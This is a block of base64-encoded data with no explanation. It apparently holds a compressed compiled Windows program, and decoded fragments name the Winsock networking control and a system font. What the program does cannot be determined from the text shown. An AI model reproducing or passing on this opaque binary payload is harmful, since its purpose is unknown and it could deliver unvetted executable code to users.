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
